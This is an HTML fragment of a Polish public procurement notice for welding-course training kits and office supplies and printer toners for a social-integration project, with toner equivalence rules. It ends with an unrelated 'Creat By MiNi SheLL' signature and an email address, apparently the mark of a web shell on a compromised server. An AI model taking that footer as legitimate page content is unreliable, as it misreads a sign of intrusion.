<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa jednorazowa 16 kompletów materiałów szkoleniowych na potrzeby uczestników i uczestniczek kursów zawodowych Spawacz metodą TIG, Spawacz metodą MAG, w ramach projektu mobilny Klub Integracji Społecznej II..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa jednorazowa 16 kompletów materiałów szkoleniowych na potrzeby uczestników i uczestniczek kursów zawodowych Spawacz metodą TIG, Spawacz metodą MAG, w ramach projektu mobilny Klub Integracji Społecznej II.
Blok biurowy A4 w kratkę, 100 k, klejony po krótkim boku oznaczone zgodnie z zasadami wizualizacji projektów współfinansowanych ze środków UE w ramach Europejskiego Funduszu Społecznego oraz nazwą projektu	16 szt.
Długopis plastikowy z mechanizmem włącz-wyłącz z gumową antypoślizgową skuwką, wkład niebieski, grubość linii 0,7 mm oznaczone zgodnie z zasadami wizualizacji projektów współfinansowanych ze środków UE w ramach Europejskiego Funduszu Społecznego oraz nazwą projektu 16 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.13-6, 30.12.51.10-5, 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa jednorazowa  materiałów biurowych, papieru ksero oraz tonerów na potrzeby Poradnictwa zawodowego w projekcie mobilny Klub Integracji Społecznej II..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa jednorazowa  materiałów biurowych, papieru ksero oraz tonerów na potrzeby Poradnictwa zawodowego w projekcie mobilny Klub Integracji Społecznej II. 
1.Segregator A4-7,5 cm dwu-ringowy mechanizm dźwigowy, okucie metalowe na dolnych krawędziach, dwustronna wymienna etykieta na grzbiecie, na przedniej okładce dwa otwory rado ułatwiające zamykanie segregatora, wzmocniony otwór na palec ułatwiający wyjmowanie segregatora, oklejony z zewnątrz folią polipropylenową 8 szt.
2.Segregator A4-5 cm dwu-ringowy mechanizm dźwigowy, okucie metalowe na dolnych krawędziach, dwustronna wymienna etykieta na grzbiecie, na przedniej okładce dwa otwory rado ułatwiające zamykanie segregatora, wzmocniony otwór na palec ułatwiający wyjmowanie segregatora, oklejony z zewnątrz folią polipropylenową 8 szt.
3.Koszulka krystaliczna na dokumenty A4 folia, otwierana z góry, przeźroczysta (op. 100 szt.) 6	op.4. Skoroszyt PCV z oczkami, zawieszany do segregatora A4, przednia okładka przezroczysta, tylna kolorowa, kolory: zielony, niebieski, fioletowy, żółty. Z wąsem metalowym. Posiadający papierowy dwustronnie zapisywany pasek brzegowy z możliwością pisania po nim długopisem 200 szt. 5. Papier ksero A4 80g-m2 (ryza 500 ark.), Klasa B, Stopień bieli CIE 161+2 -20	ryz.6.Papier Flipchart, gramatura 80 g, biały z perforacja do zawieszenia 64 x 95,5 cm 20 k 6 szt.7.Toner do drukarki HP Laser Jet M2727 nf. Okres gwarancji: co najmniej 24 miesiące od dnia odbioru przez Zamawiającego,
Toner  równoważny opisanemu musi być kompatybilny z w/w  drukarką i spełniać wymagania dotyczące przedmiotu zamówienia 3 szt.8. Toner Konika Minolta Bizhub 283 (TN 217). Okres gwarancji: co najmniej 24 miesiące od dnia odbioru przez Zamawiającego,
Toner  równoważny opisanemu musi być kompatybilny z w/w  drukarką i spełniać wymagania dotyczące przedmiotu zamówienia 2 szt.
9.Toner do drukarki HP Laser Jet P1102, Okres gwarancji: co najmniej 24 miesiące od dnia odbioru przez Zamawiającego,Toner  równoważny opisanemu musi być kompatybilny z w/w  drukarką i spełniać wymagania dotyczące przedmiotu zamówienia 2 szt.10.Toner do drukarki HP Laser Jet 1018. Okres gwarancji: co najmniej 24 miesiące od dnia odbioru przez Zamawiającego,Toner  równoważny opisanemu musi być kompatybilny z w/w  drukarką i spełniać wymagania dotyczące przedmiotu zamówienia 1Szt.Wymagania dotyczące przedmiotu zamówienia : 
1.Zamawiający wymaga dostawy materiałów eksploatacyjnych fabrycznie nowych, oryginalnych wyprodukowanych przez producenta sprzętu lub materiałów eksploatacyjnych równoważnych.2.Przez materiał eksploatacyjny równoważny Zamawiający rozumie produkt:
a.fabrycznie nowy, nie regenerowany, pochodzący z bieżącej produkcji, wytworzony seryjnie w cyklu produkcyjnym, zgodnym z normą ISO 9001 lub normami równoważnymi, nie powodujący utraty gwarancji,b.opakowany hermetycznie, nie noszący śladów użytkowania,
c.którego wydajność, zgodnie z normą ISO-IEC 19752 dla kaset z tonerem do drukarek monochromatycznych, ISO-IEC 19798 dla kaset z tonerem do kolorowych drukarek laserowych, oraz ISO-IEC 24711 dla wkładów drukujących, jest co najmniej taka jak materiału oryginalnego zalecanego przez producentów sprzętu,d.który zapewnia jakość wydruku co najmniej taką, jak materiał oryginalny, zalecany przez producenta sprzętu,.e.który nie ogranicza pełnej współpracy z programem sprzętu, monitorującym stan zasobników 
z tuszem lub tonerem,f.który w żadnym stopniu nie narusza praw patentowych ani innej własności intelektualnej, g.w którym wszystkie części są nowe, w szczególności bęben światłoczuły, listwa podająca, listwa zbierająca, wałek magnetyczny, h.w którym zastosowano toner -tusz dopasowany do pracy z danym urządzeniem. 3.Wszystkie oferowane materiały winny być opatrzone znakiem firmowym producenta, etykietą zawierającą numer katalogowy, kod kreskowy, listę modeli sprzętu, do których jest przeznaczony oraz termin ważności. 4.Zamawiający nie dopuszcza możliwości zaoferowania materiałów eksploatacyjnych napełnianych powtórnie lub skopiowanych w sposób naruszający prawo polskie lub UE.5.Wszystkie materiały eksploatacyjne muszą posiadać: a.dla poszczególnych tonerów dokumenty- testy wydajnościowe, z których w sposób nie budzący wątpliwości winno wynikać, że oferowany materiał posiada takie same lub lepsze parametry techniczne, wydajnościowe i jakościowe zgodnie z normami:  ISO-IEC 19752 - dla tonerów monochromatycznych ISO-IEC 24711 - dla wkładów atramentowych , ISO-IEC 19798 - dla tonerów kolorowych.b.certyfikaty-dokumenty potwierdzające, że proces produkcji zaproponowanego asortymentu przebiega zgodnie z normami ISO 90001: 2000. Powyższe dokumenty Wykonawca będzie zobowiązany dostarczyć wraz z dostawą materiałów do siedziby Zamawiającego.  6.Jeżeli w trakcie trwania umowy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych produktów odbiega na niekorzyść od parametrów produktu oryginalnego (pochodzącego od producenta urządzenia, do którego materiał jest przeznaczony) lub jeżeli produkt  nie sygnalizuje we właściwy sposób stanu zużycia tuszu lub tonera, może zażądać od Wykonawcy zamiany materiału oferowanego na materiał nowy.7.W przypadku trzeciej reklamacji danego typu materiału eksploatacyjnego Zamawiający może żądać dostaw materiałów oryginalnych.
Oferta równoważna:Wszystkie wskazane  materiały należy rozumieć jako określenie wymaganych parametrów technicznych 
lub standardów jakościowych. Zamawiający dopuszcza dostawę materiałów eksploatacyjnych równoważnych 
do drukarek co do jakości i zastosowanych rozwiązań technicznych i technologicznych opisywanych w niniejszej specyfikacji.                     
Jeżeli Wykonawca składający ofertę zaoferuje rozwiązania równoważne, to na Wykonawcy spoczywa obowiązek (ciężar dowodu) wykazania równoważności poprzez złożenie w ofercie odpowiednich dokumentów potwierdzających tą równoważność..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.13-6, 30.12.51.10-5, 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com